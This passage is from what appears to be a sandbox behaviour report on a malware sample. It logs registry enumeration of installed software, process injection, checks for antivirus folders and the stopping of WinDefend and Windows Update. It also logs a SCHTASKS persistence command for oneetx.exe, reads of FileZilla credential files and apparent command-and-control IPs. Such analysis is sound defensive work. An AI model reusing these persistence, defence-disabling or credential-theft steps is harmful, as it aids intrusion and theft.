 regkey_r: {90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-001F-0409-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-001F-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0028-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-002C-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0030-0000-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0044-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-006E-0409-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-006E-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-00A1-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0114-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

 regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

 regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000294
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

 regkey_r: AddressBook
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

 regkey_r: Connection Manager
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

 regkey_r: DirectDrawEx
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

 regkey_r: EditPlus
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

 regkey_r: ENTERPRISE
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

 regkey_r: Fontcore
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

 regkey_r: Google Chrome
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: Haansoft HWord 80 Korean
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

 regkey_r: IE40
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

 regkey_r: IE4Data
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2136
process_handle: 0x000002bc
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2136
process_handle: 0x000002bc
1 0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2136
process_handle: 0x000002bc
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2136
process_handle: 0x000002bc
3221225738 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2376
process_handle: 0x000002bc
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2376
process_handle: 0x000002bc
1 0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2376
process_handle: 0x000002bc
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2376
process_handle: 0x000002bc
3221225738 0
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe" /F
wmi SELECT * FROM Win32_Processor
host 185.161.248.25
host 77.91.124.20
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 320
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2684
region_size: 172032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2860
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002b8
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2376
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 504
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1764
region_size: 172032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

ControlService

 service_handle: 0x005b6470
service_name: WinDefend
control_code: 1
0 0

ControlService

 service_handle: 0x005b67e0
service_name: wuauserv
control_code: 1
0 0
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\foto0174.exe reg_value C:\Users\test22\AppData\Local\Temp\1000020051\foto0174.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fotocr23.exe reg_value C:\Users\test22\AppData\Local\Temp\1000021051\fotocr23.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP005.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP006.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP007.TMP\"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe" /F
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
wmi SELECT * FROM Win32_VideoController
wmi SELECT * FROM AntivirusProduct
wmi SELECT * FROM Win32_OperatingSystem
wmi SELECT * FROM Win32_Process Where SessionId='1'
wmi SELECT * FROM AntiSpyWareProduct
wmi SELECT * FROM FirewallProduct
wmi SELECT * FROM Win32_DiskDrive
wmi SELECT * FROM Win32_Processor
Process injection Process 2084 manipulating memory of non-child process 2136
Process injection Process 2444 manipulating memory of non-child process 2684
Process injection Process 1484 manipulating memory of non-child process 2376
Time & API Arguments Status Return Repeated

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 774144
process_identifier: 2136
process_handle: 0x000002bc
3221225497 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
3221225496 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 16384
process_identifier: 2684
process_handle: 0x000002bc
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2684
region_size: 172032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
1 0 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 577536
process_identifier: 2376
process_handle: 0x000002bc
3221225497 0

NtAllocateVirtualMemory

 process_identifier: 2376
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
3221225496 0
Time & API Arguments Status Return Repeated

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
